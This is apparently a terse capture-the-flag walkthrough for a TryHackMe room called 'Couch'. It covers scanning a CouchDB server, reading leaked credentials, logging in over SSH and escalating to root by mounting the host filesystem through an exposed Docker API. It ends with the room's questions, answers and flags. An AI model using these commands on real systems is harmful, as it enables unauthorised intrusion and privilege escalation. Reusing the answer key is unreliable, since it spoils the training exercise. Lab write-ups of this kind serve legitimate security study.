Couch

Last updated 2 years ago

Was this helpful?

found port 22, 5984

feroxbuster --url http://10.10.26.128:5984/ -w /usr/share/wordlists/dirb/common.txt -t 60 -C 404,403

found secret, _stats, _logs, _utils and more with status 200

curl -X GET http://127.0.0.1:5984/_all_dbs ==found in 10.10.26.128:5984/_utils/docs/intro/tour.html==

http://10.10.26.128:5984/_utils/document.html?secret/a1320dd69fb4570d0a3d26df4e000be7 -> atena:t4qfzcc4qN##

ssh atena@10.10.26.128

netstat -antup

cat ~/.bash_history

docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

There is docker running in this host. Lets run the docker

docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

find . -name root.txt 2>/dev/null

cat mnt/root/root.txt

Scan the machine. How many ports are open?2
What is the database management system installed on the server?CouchDB
What port is the database management system running on?5984
What is the version of the management system installed on the server?1.6.1
What is the path for the web administration tool for this database management system?_utils
What is the path to list all databases in the web browser of the database management system?_all_dbs
What are the credentials found in the web administration tool?atena:t4qfzcc4qN##
Compromise the machine and locate user.txtTHM{1ns3cure_couchdb}
Escalate privileges and obtain root.txtTHM{RCE_us1ng_Docker_API}

[[Year of the rabbit]]

Last updated 2 years ago

Was this helpful?